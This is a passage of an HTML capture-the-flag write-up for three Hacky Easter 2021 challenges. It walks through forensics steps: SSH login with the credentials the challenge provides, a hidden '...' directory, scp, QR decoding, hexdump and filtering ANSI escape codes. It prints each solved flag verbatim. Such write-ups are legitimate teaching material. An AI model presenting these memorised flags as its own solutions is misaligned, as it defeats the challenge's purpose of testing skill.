class=\"hl\">he2021{h3xpr3ss_urs3lf}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_10\">HE21.10 Ghost in a Shell 1<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge10.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table 
class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">4 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Forensics<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\n     _, _,_  _,  _, ___   _ _, _    _,    _, _,_ __, _,  _,    ,  \r\n    \/ _ |_| \/ \\ (_   |    | |\\ |   \/_\\   (_  |_| |_  |   |     |  \r\n    \\ \/ | | \\ \/ , )  |    | | \\|   | |   , ) | | |   | , | ,   |  \r\n     ~  ~ ~  ~   ~   ~    ~ ~  ~   ~ ~    ~  ~ ~ ~~~ ~~~ ~~~   ~  \r\n   ______________________________________________________________________  \r\n    ,--.    \r\n   | oo |   \r\n   | ~~ |   o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  \r\n   |\/\\\/\\|   \r\n   ______________________________________________________________________  \r\n     \r\n   \r\nConnect to the server, snoop around, and find the flag!\r\n\r\n    - <span class=\"hl\">ssh 46.101.107.117 -p 2106 -l inky<\/span>\r\n    - password is: <span class=\"hl\">mucky_4444<\/span>\r\n\r\nNote: The service is restarted every hour at x:00.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nWe start by ssh&#8217;ing to the provided machine:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/10]\r\n\u2514\u2500$ ssh 46.101.107.117 -p 2106 -l inky\r\ninky@46.101.107.117's password: \r\n\r\n  _, _,_  _,  _, ___   _ _, _    _,    _, _,_ __, _,  _,    ,\r\n \/ _ |_| \/ \\ (_   |    | |\\ |   \/_\\   (_  |_| |_  |   |     |\r\n \\ \/ | | \\ \/ , )  |    | | \\|   | |   , ) | | |   | , | ,   |\r\n  ~  ~ ~  ~   ~   ~    ~ ~  ~   ~ ~    ~  ~ ~ ~~~ ~~~ ~~~   ~\r\n______________________________________________________________________\r\n ,--.  
\r\n| oo | \r\n| ~~ |   o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o\r\n|\/\\\/\\| \r\n______________________________________________________________________\r\n\r\nFind the flag!\r\n\r\n9aebfee25d34:~$\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe home directory of our user contains a folder called <span class=\"hl\">images<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n9aebfee25d34:~$ ls -al\r\ntotal 40\r\ndrwxr-xr-x    1 root     root          4096 Apr 13 14:00 .\r\ndrwxr-xr-x    1 root     root          4096 Apr  3 05:23 ..\r\n-rwxr-xr-x    1 root     root            15 Apr 13 14:00 .bashrc\r\n<span class=\"hl2\">drwxr-xr-x    1 root     root          4096 Apr  3 05:23 images<\/span>\r\n-rwxr-xr-x    1 root     root          2183 Feb 27 17:53 notes.txt\r\ndrwxr-xr-x    1 root     root          4096 Apr  3 05:23 text\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nAlthough it is easy to overlook, this directory contains a directory called <span class=\"hl\">&#8220;&#8230;&#8221;<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n9aebfee25d34:~$ ls -al images\r\ntotal 304\r\ndrwxr-xr-x    1 root     root          4096 Apr  3 05:23 .\r\ndrwxr-xr-x    1 root     root          4096 Apr 13 14:00 ..\r\n<span class=\"hl2\">drwxr-xr-x    1 root     root          4096 Apr  3 05:23 ...<\/span>\r\n-rwxr-xr-x    1 root     root         23864 Feb 27 17:53 ghost_1.png\r\n-rwxr-xr-x    1 root     root         25957 Feb 27 17:53 ghost_2.png\r\n-rwxr-xr-x    1 root     root         37335 Feb 27 17:53 ghost_3.png\r\n-rwxr-xr-x    1 root     root         30530 Feb 27 17:53 ghost_4.png\r\n-rwxr-xr-x    1 root     root         27476 Feb 27 17:53 ghost_5.png\r\n-rwxr-xr-x    1 root     root         35378 Feb 27 17:53 ghost_6.png\r\n-rwxr-xr-x    1 root     root         31358 Feb 27 17:53 ghost_7.png\r\n-rwxr-xr-x    1 root     root         32507 Feb 27 17:53 ghost_8.png\r\n-rwxr-xr-x    1 root     root         27413 Feb 27 17:53 ghost_9.png\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWithin the <span 
class=\"hl\">&#8220;&#8230;&#8221;<\/span> directory there is a file also called <span class=\"hl\">&#8220;&#8230;&#8221;<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n9aebfee25d34:~$ ls -al images\/...\/\r\ntotal 36\r\ndrwxr-xr-x    1 root     root          4096 Apr  3 05:23 .\r\ndrwxr-xr-x    1 root     root          4096 Apr  3 05:23 ..\r\n<span class=\"hl2\">-rwxr-xr-x    1 root     root         20263 Feb 27 17:53 ...<\/span>\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWe can download this file to our machine using <span class=\"hl\">scp<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/10]\r\n\u2514\u2500$ scp -r -P 2106 inky@46.101.107.117:\/home\/inky\/images\/...\/... loot\r\ninky@46.101.107.117's password: \r\n..\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe file is actually an image:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/10]\r\n\u2514\u2500$ file loot                    \r\nloot: PNG image data, 1024 x 1024, 8-bit colormap, non-interlaced\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIndeed the egg:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_10_01.png\" alt=\"Egg\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe only thing left to do is scan the QR code:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/10]\r\n\u2514\u2500$ zbarimg loot                \r\nQR-Code:he2021{h1dd3n_d0td0td0t!}\r\nscanned 1 barcode symbols from 1 images in 0.05 seconds\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{h1dd3n_d0td0td0t!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_11\">HE21.11 Hidden<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge11.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">4 
(easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Forensics<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>khae<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nI swear I had the flag a minute ago, but now it seems to be hidden somewhere...\r\n\r\nGo back to level 3 and analyze the files of the challenges again. If you look hard enough, you can find an additional flag.\r\n\r\n<b>Hint<\/b>\r\n\r\nThe <b>sol<\/b>ution is hidden in an image. It's hidden in the <b>file content<\/b>, not in the image (no steganography).\r\n\r\nThere are some numbers in the flag: <span class=\"hl\">he2021{W\u26100\u2610\u2610\u2610\u2610\u2610\u2610\u2610\u2610\u2610\u2610\u26100\u2610\u2610\u26103\u2610\u2610\u2610\u2610\u26105\u2610}<\/span>\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThis flag is hidden in <a href=\"#he21_08\">challenge 08<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nWhen running <span class=\"hl\">hexdump<\/span> on the provided image, we can see an ASCII art flag at the end of the output:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/08]\r\n\u2514\u2500$ hexdump -C sunshine.png\r\n00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|\r\n00000010  00 00 07 d0 00 00 05 35  08 03 00 00 00 7c f0 af  |.......5.....|..|\r\n...\r\n00119ff0  ae 42 60 82 20 5f 20 20  20 20 20 20 20 20 20 20  |.B&#x60;. 
_          |\r\n0011a000  20 20 20 20 7c 20 7c 5f  5f 20 20 20 20 20 20 20  |    | |__       |\r\n0011a010  20 20 20 20 7c 20 27 5f  20 5c 20 20 20 20 20 20  |    | '_ \\      |\r\n0011a020  20 20 20 20 7c 20 7c 20  7c 20 7c 20 20 20 20 20  |    | | | |     |\r\n0011a030  20 20 20 20 7c 5f 7c 20  7c 5f 7c 20 20 20 20 20  |    |_| |_|     |\r\n0011a040  20 20 20 20 20 20 5f 5f  5f 20 20 20 20 20 20 20  |      ___       |\r\n0011a050  20 20 20 20 20 2f 20 5f  20 5c 20 20 20 20 20 20  |     \/ _ \\      |\r\n0011a060  20 20 20 20 7c 20 20 5f  5f 2f 20 20 20 20 20 20  |    |  __\/      |\r\n0011a070  20 20 20 20 20 5c 5f 5f  5f 7c 20 20 20 20 20 20  |     \\___|      |\r\n0011a080  20 20 20 20 20 5f 5f 5f  5f 20 20 20 20 20 20 20  |     ____       |\r\n0011a090  20 20 20 20 7c 5f 5f 5f  20 5c 20 20 20 20 20 20  |    |___ \\      |\r\n0011a0a0  20 20 20 20 20 20 5f 5f  29 20 7c 20 20 20 20 20  |      __) |     |\r\n0011a0b0  20 20 20 20 20 2f 20 5f  5f 2f 20 20 20 20 20 20  |     \/ __\/      |\r\n0011a0c0  20 20 20 20 7c 5f 5f 5f  5f 5f 7c 20 20 20 20 20  |    |_____|     |\r\n0011a0d0  20 20 20 20 20 20 5f 5f  5f 20 20 20 20 20 20 20  |      ___       |\r\n0011a0e0  20 20 20 20 20 2f 20 5f  20 5c 20 20 20 20 20 20  |     \/ _ \\      |\r\n0011a0f0  20 20 20 20 7c 20 7c 20  7c 20 7c 20 20 20 20 20  |    | | | |     |\r\n0011a100  20 20 20 20 7c 20 7c 5f  7c 20 7c 20 20 20 20 20  |    | |_| |     |\r\n0011a110  20 20 20 20 20 5c 5f 5f  5f 2f 20 20 20 20 20 20  |     \\___\/      |\r\n0011a120  20 20 20 20 20 5f 5f 5f  5f 20 20 20 20 20 20 20  |     ____       |\r\n0011a130  20 20 20 20 7c 5f 5f 5f  20 5c 20 20 20 20 20 20  |    |___ \\      |\r\n0011a140  20 20 20 20 20 20 5f 5f  29 20 7c 20 20 20 20 20  |      __) |     |\r\n0011a150  20 20 20 20 20 2f 20 5f  5f 2f 20 20 20 20 20 20  |     \/ __\/      |\r\n0011a160  20 20 20 20 7c 5f 5f 5f  5f 5f 7c 20 20 20 20 20  |    |_____|     |\r\n0011a170  20 20 20 20 20 5f 20 20  20 20 20 20 20 20 20 20  |     _          
|\r\n0011a180  20 20 20 20 2f 20 7c 20  20 20 20 20 20 20 20 20  |    \/ |         |\r\n0011a190  20 20 20 20 7c 20 7c 20  20 20 20 20 20 20 20 20  |    | |         |\r\n*\r\n0011a1b0  20 20 20 20 7c 5f 7c 20  20 20 20 20 20 20 20 20  |    |_|         |\r\n0011a1c0  20 20 20 20 20 20 20 5f  5f 20 20 20 20 20 20 20  |       __       |\r\n0011a1d0  20 20 20 20 20 20 2f 20  2f 20 20 20 20 20 20 20  |      \/ \/       |\r\n0011a1e0  20 20 20 20 20 7c 20 7c  20 20 20 20 20 20 20 20  |     | |        |\r\n0011a1f0  20 20 20 20 3c 20 3c 20  20 20 20 20 20 20 20 20  |    &lt; &lt;         |\r\n0011a200  20 20 20 20 20 7c 20 7c  20 20 20 20 20 20 20 20  |     | |        |\r\n0011a210  20 20 20 20 20 20 5c 5f  5c 20 20 20 20 20 20 20  |      \\_\\       |\r\n0011a220  20 20 20 20 5f 5f 20 20  20 20 20 20 20 20 5f 5f  |    __        __|\r\n0011a230  20 20 20 20 5c 20 5c 20  20 20 20 20 20 2f 20 2f  |    \\ \\      \/ \/|\r\n0011a240  20 20 20 20 20 5c 20 5c  20 2f 5c 20 2f 20 2f 20  |     \\ \\ \/\\ \/ \/ |\r\n0011a250  20 20 20 20 20 20 5c 20  56 20 20 56 20 2f 20 20  |      \\ V  V \/  |\r\n0011a260  20 20 20 20 20 20 20 5c  5f 2f 5c 5f 2f 20 20 20  |       \\_\/\\_\/   |\r\n0011a270  20 20 20 20 20 5f 20 20  20 20 20 20 20 20 20 20  |     _          |\r\n0011a280  20 20 20 20 7c 20 7c 5f  5f 20 20 20 20 20 20 20  |    | |__       |\r\n0011a290  20 20 20 20 7c 20 27 5f  20 5c 20 20 20 20 20 20  |    | '_ \\      |\r\n0011a2a0  20 20 20 20 7c 20 7c 20  7c 20 7c 20 20 20 20 20  |    | | | |     |\r\n0011a2b0  20 20 20 20 7c 5f 7c 20  7c 5f 7c 20 20 20 20 20  |    |_| |_|     |\r\n0011a2c0  20 20 20 20 20 20 5f 5f  5f 20 20 20 20 20 20 20  |      ___       |\r\n0011a2d0  20 20 20 20 20 2f 20 5f  20 5c 20 20 20 20 20 20  |     \/ _ \\      |\r\n0011a2e0  20 20 20 20 7c 20 7c 20  7c 20 7c 20 20 20 20 20  |    | | | |     |\r\n0011a2f0  20 20 20 20 7c 20 7c 5f  7c 20 7c 20 20 20 20 20  |    | |_| |     |\r\n0011a300  20 20 20 20 20 5c 5f 5f  5f 2f 20 20 20 20 20 20  |     \\___\/ 
     |\r\n0011a310  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n*\r\n0011a350  20 20 20 20 20 5f 5f 5f  5f 5f 20 20 20 20 20 20  |     _____      |\r\n0011a360  20 20 20 20 7c 5f 5f 5f  5f 5f 7c 20 20 20 20 20  |    |_____|     |\r\n0011a370  20 20 20 20 20 5f 20 20  20 20 20 20 20 20 20 20  |     _          |\r\n0011a380  20 20 20 20 28 5f 29 20  20 20 20 20 20 20 20 20  |    (_)         |\r\n0011a390  20 20 20 20 7c 20 7c 20  20 20 20 20 20 20 20 20  |    | |         |\r\n*\r\n0011a3b0  20 20 20 20 7c 5f 7c 20  20 20 20 20 20 20 20 20  |    |_|         |\r\n0011a3c0  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n0011a3d0  20 20 20 20 20 5f 5f 5f  20 20 20 20 20 20 20 20  |     ___        |\r\n0011a3e0  20 20 20 20 2f 20 5f 5f  7c 20 20 20 20 20 20 20  |    \/ __|       |\r\n0011a3f0  20 20 20 20 5c 5f 5f 20  5c 20 20 20 20 20 20 20  |    \\__ \\       |\r\n0011a400  20 20 20 20 7c 5f 5f 5f  2f 20 20 20 20 20 20 20  |    |___\/       |\r\n0011a410  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n*\r\n0011a450  20 20 20 20 20 5f 5f 5f  5f 5f 20 20 20 20 20 20  |     _____      |\r\n0011a460  20 20 20 20 7c 5f 5f 5f  5f 5f 7c 20 20 20 20 20  |    |_____|     |\r\n0011a470  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n0011a480  20 20 20 20 20 5f 5f 5f  20 20 20 20 20 20 20 20  |     ___        |\r\n0011a490  20 20 20 20 2f 20 5f 5f  7c 20 20 20 20 20 20 20  |    \/ __|       |\r\n0011a4a0  20 20 20 20 5c 5f 5f 20  5c 20 20 20 20 20 20 20  |    \\__ \\       |\r\n0011a4b0  20 20 20 20 7c 5f 5f 5f  2f 20 20 20 20 20 20 20  |    |___\/       |\r\n0011a4c0  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n0011a4d0  20 20 20 20 20 20 5f 5f  5f 20 20 20 20 20 20 20  |      ___       |\r\n0011a4e0  20 20 20 20 20 2f 20 5f  5f 7c 20 20 20 20 20 20  |     \/ __|      |\r\n0011a4f0  20 20 20 20 7c 20 28 5f  5f 20 20 20 20 20 20 20  |    | (__       
|\r\n0011a500  20 20 20 20 20 5c 5f 5f  5f 7c 20 20 20 20 20 20  |     \\___|      |\r\n0011a510  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n0011a520  20 20 20 20 20 20 5f 5f  20 5f 20 20 20 20 20 20  |      __ _      |\r\n0011a530  20 20 20 20 20 2f 20 5f  60 20 7c 20 20 20 20 20  |     \/ _&#x60; |     |\r\n0011a540  20 20 20 20 7c 20 28 5f  7c 20 7c 20 20 20 20 20  |    | (_| |     |\r\n0011a550  20 20 20 20 20 5c 5f 5f  2c 5f 7c 20 20 20 20 20  |     \\__,_|     |\r\n0011a560  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n0011a570  20 20 20 20 20 5f 20 5f  5f 20 20 20 20 20 20 20  |     _ __       |\r\n0011a580  20 20 20 20 7c 20 27 5f  5f 7c 20 20 20 20 20 20  |    | '__|      |\r\n0011a590  20 20 20 20 7c 20 7c 20  20 20 20 20 20 20 20 20  |    | |         |\r\n0011a5a0  20 20 20 20 7c 5f 7c 20  20 20 20 20 20 20 20 20  |    |_|         |\r\n0011a5b0  20 20 20 20 20 20 5f 5f  5f 20 20 20 20 20 20 20  |      ___       |\r\n0011a5c0  20 20 20 20 20 2f 20 5f  20 5c 20 20 20 20 20 20  |     \/ _ \\      |\r\n0011a5d0  20 20 20 20 7c 20 20 5f  5f 2f 20 20 20 20 20 20  |    |  __\/      |\r\n0011a5e0  20 20 20 20 20 5c 5f 5f  5f 7c 20 20 20 20 20 20  |     \\___|      |\r\n0011a5f0  20 20 20 20 20 20 20 20  20 5f 20 20 20 20 20 20  |         _      |\r\n0011a600  20 20 20 20 20 20 5f 5f  7c 20 7c 20 20 20 20 20  |      __| |     |\r\n0011a610  20 20 20 20 20 2f 20 5f  60 20 7c 20 20 20 20 20  |     \/ _&#x60; |     |\r\n0011a620  20 20 20 20 7c 20 28 5f  7c 20 7c 20 20 20 20 20  |    | (_| |     |\r\n0011a630  20 20 20 20 20 5c 5f 5f  2c 5f 7c 20 20 20 20 20  |     \\__,_|     |\r\n0011a640  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n*\r\n0011a680  20 20 20 20 20 5f 5f 5f  5f 5f 20 20 20 20 20 20  |     _____      |\r\n0011a690  20 20 20 20 7c 5f 5f 5f  5f 5f 7c 20 20 20 20 20  |    |_____|     |\r\n0011a6a0  20 20 20 20 20 20 5f 5f  5f 20 20 20 20 20 20 20  |      ___       
|\r\n0011a6b0  20 20 20 20 20 2f 20 5f  20 5c 20 20 20 20 20 20  |     \/ _ \\      |\r\n0011a6c0  20 20 20 20 7c 20 7c 20  7c 20 7c 20 20 20 20 20  |    | | | |     |\r\n0011a6d0  20 20 20 20 7c 20 7c 5f  7c 20 7c 20 20 20 20 20  |    | |_| |     |\r\n0011a6e0  20 20 20 20 20 5c 5f 5f  5f 2f 20 20 20 20 20 20  |     \\___\/      |\r\n0011a6f0  20 20 20 20 20 20 5f 5f  20 20 20 20 20 20 20 20  |      __        |\r\n0011a700  20 20 20 20 20 2f 20 5f  7c 20 20 20 20 20 20 20  |     \/ _|       |\r\n0011a710  20 20 20 20 7c 20 7c 5f  20 20 20 20 20 20 20 20  |    | |_        |\r\n0011a720  20 20 20 20 7c 20 20 5f  7c 20 20 20 20 20 20 20  |    |  _|       |\r\n0011a730  20 20 20 20 7c 5f 7c 20  20 20 20 20 20 20 20 20  |    |_|         |\r\n0011a740  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n*\r\n0011a780  20 20 20 20 20 5f 5f 5f  5f 5f 20 20 20 20 20 20  |     _____      |\r\n0011a790  20 20 20 20 7c 5f 5f 5f  5f 5f 7c 20 20 20 20 20  |    |_____|     |\r\n0011a7a0  20 20 20 20 20 5f 20 20  20 20 20 20 20 20 20 20  |     _          |\r\n0011a7b0  20 20 20 20 7c 20 7c 5f  5f 20 20 20 20 20 20 20  |    | |__       |\r\n0011a7c0  20 20 20 20 7c 20 27 5f  20 5c 20 20 20 20 20 20  |    | '_ \\      |\r\n0011a7d0  20 20 20 20 7c 20 7c 20  7c 20 7c 20 20 20 20 20  |    | | | |     |\r\n0011a7e0  20 20 20 20 7c 5f 7c 20  7c 5f 7c 20 20 20 20 20  |    |_| |_|     |\r\n0011a7f0  20 20 20 20 20 5f 5f 5f  5f 5f 20 20 20 20 20 20  |     _____      |\r\n0011a800  20 20 20 20 7c 5f 5f 5f  20 2f 20 20 20 20 20 20  |    |___ \/      |\r\n0011a810  20 20 20 20 20 20 7c 5f  20 5c 20 20 20 20 20 20  |      |_ \\      |\r\n0011a820  20 20 20 20 20 5f 5f 5f  29 20 7c 20 20 20 20 20  |     ___) |     |\r\n0011a830  20 20 20 20 7c 5f 5f 5f  5f 2f 20 20 20 20 20 20  |    |____\/      |\r\n0011a840  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n0011a850  20 20 20 20 5f 5f 20 20  5f 5f 20 20 20 20 20 20  |    __  __      |\r\n0011a860  20 
20 20 20 5c 20 5c 2f  20 2f 20 20 20 20 20 20  |    \\ \\\/ \/      |\r\n0011a870  20 20 20 20 20 3e 20 20  3c 20 20 20 20 20 20 20  |     &gt;  &lt;       |\r\n0011a880  20 20 20 20 2f 5f 2f 5c  5f 5c 20 20 20 20 20 20  |    \/_\/\\_\\      |\r\n0011a890  20 20 20 20 20 20 20 20  20 5f 20 20 20 20 20 20  |         _      |\r\n0011a8a0  20 20 20 20 20 20 5f 5f  7c 20 7c 20 20 20 20 20  |      __| |     |\r\n0011a8b0  20 20 20 20 20 2f 20 5f  60 20 7c 20 20 20 20 20  |     \/ _&#x60; |     |\r\n0011a8c0  20 20 20 20 7c 20 28 5f  7c 20 7c 20 20 20 20 20  |    | (_| |     |\r\n0011a8d0  20 20 20 20 20 5c 5f 5f  2c 5f 7c 20 20 20 20 20  |     \\__,_|     |\r\n0011a8e0  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n0011a8f0  20 20 20 20 20 5f 20 20  20 5f 20 20 20 20 20 20  |     _   _      |\r\n0011a900  20 20 20 20 7c 20 7c 20  7c 20 7c 20 20 20 20 20  |    | | | |     |\r\n0011a910  20 20 20 20 7c 20 7c 5f  7c 20 7c 20 20 20 20 20  |    | |_| |     |\r\n0011a920  20 20 20 20 20 5c 5f 5f  2c 5f 7c 20 20 20 20 20  |     \\__,_|     |\r\n0011a930  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n0011a940  20 20 20 20 20 5f 20 5f  5f 20 5f 5f 5f 20 20 20  |     _ __ ___   |\r\n0011a950  20 20 20 20 7c 20 27 5f  20 60 20 5f 20 5c 20 20  |    | '_ &#x60; _ \\  |\r\n0011a960  20 20 20 20 7c 20 7c 20  7c 20 7c 20 7c 20 7c 20  |    | | | | | | |\r\n0011a970  20 20 20 20 7c 5f 7c 20  7c 5f 7c 20 7c 5f 7c 20  |    |_| |_| |_| |\r\n0011a980  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n0011a990  20 20 20 20 20 5f 20 5f  5f 20 20 20 20 20 20 20  |     _ __       |\r\n0011a9a0  20 20 20 20 7c 20 27 5f  20 5c 20 20 20 20 20 20  |    | '_ \\      |\r\n0011a9b0  20 20 20 20 7c 20 7c 5f  29 20 7c 20 20 20 20 20  |    | |_) |     |\r\n0011a9c0  20 20 20 20 7c 20 2e 5f  5f 2f 20 20 20 20 20 20  |    | .__\/      |\r\n0011a9d0  20 20 20 20 7c 5f 7c 20  20 20 20 20 20 20 20 20  |    |_|         |\r\n0011a9e0  20 
20 20 20 20 5f 5f 5f  5f 20 20 20 20 20 20 20  |     ____       |\r\n0011a9f0  20 20 20 20 7c 20 5f 5f  5f 7c 20 20 20 20 20 20  |    | ___|      |\r\n0011aa00  20 20 20 20 7c 5f 5f 5f  20 5c 20 20 20 20 20 20  |    |___ \\      |\r\n0011aa10  20 20 20 20 20 5f 5f 5f  29 20 7c 20 20 20 20 20  |     ___) |     |\r\n0011aa20  20 20 20 20 7c 5f 5f 5f  5f 2f 20 20 20 20 20 20  |    |____\/      |\r\n0011aa30  20 20 20 20 20 5f 5f 5f  20 20 20 20 20 20 20 20  |     ___        |\r\n0011aa40  20 20 20 20 7c 5f 5f 20  5c 20 20 20 20 20 20 20  |    |__ \\       |\r\n0011aa50  20 20 20 20 20 20 2f 20  2f 20 20 20 20 20 20 20  |      \/ \/       |\r\n0011aa60  20 20 20 20 20 7c 5f 7c  20 20 20 20 20 20 20 20  |     |_|        |\r\n0011aa70  20 20 20 20 20 28 5f 29  20 20 20 20 20 20 20 20  |     (_)        |\r\n0011aa80  20 20 20 20 5f 5f 20 20  20 20 20 20 20 20 20 20  |    __          |\r\n0011aa90  20 20 20 20 5c 20 5c 20  20 20 20 20 20 20 20 20  |    \\ \\         |\r\n0011aaa0  20 20 20 20 20 7c 20 7c  20 20 20 20 20 20 20 20  |     | |        |\r\n0011aab0  20 20 20 20 20 20 3e 20  3e 20 20 20 20 20 20 20  |      &gt; &gt;       |\r\n0011aac0  20 20 20 20 20 7c 20 7c  20 20 20 20 20 20 20 20  |     | |        |\r\n0011aad0  20 20 20 20 2f 5f 2f 20  20 20 20 20 20 20 20 20  |    \/_\/         |\r\n0011aae0  20 20 20 20 0a                                    |    .|\r\n0011aae5\r\n\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nI wasted some time trying to enter this flag for challenge 8, because I <span class=\"hl\">hexdump<\/span>&#8216;ed the image before looking at it.\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{who_is_scared_of_h3xdump5?}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_12\">HE21.12 Ansi Art<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge12.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span 
class=\"easy\">4 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Pwn<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nHope you like my ansi art egg!\r\n\r\nGet it with <span class=\"hl\">nc 46.101.107.117 2105<\/span>\r\n\r\nNote: The service is restarted every hour at x:00.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided service outputs an ASCII art egg:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_12_01.png\" alt=\"ASCII\"\/>\r\n<\/p>\r\n\r\n<p>\r\nWe can pipe the output to a file, to further analyze it:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/12]\r\n\u2514\u2500$ nc 46.101.107.117 2105 &gt; out\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nBy running <span class=\"hl\">strings<\/span> on the output we can display the ANSI escape codes:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/12]\r\n\u2514\u2500$ strings out\r\n[38;5;16;48;5;16m\r\n[38;5;16;48;5;16m\r\n[38;5;16;48;5;16m\r\n[38;5;16;48;5;16m\r\n[38;5;16;48;5;16m\r\n...\r\n[38;5;74;48;5;235m\r\n[38;5;74;48;5;235m\r\n...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIf we filter out <span class=\"hl\">[38<\/span>, we can see the single characters of the flag:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/12]\r\n\u2514\u2500$ strings out | grep -v '\\[38'\r\n[30mh\r\n[31me\r\n[32m2\r\n[33m0\r\n[34m2\r\n[35m1\r\n[36m{\r\n[37m4\r\n[90mN\r\n[91ms\r\n[92m1\r\n[93mM\r\n[94mG\r\n[95m1\r\n[96mk\r\n[97m}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we only need to extract the characters:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/12]\r\n\u2514\u2500$ strings out2 | grep -v '\\[38' | grep -o '.$' | tr -d '\\n'\r\nhe2021{4Ns1MG1k}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span 
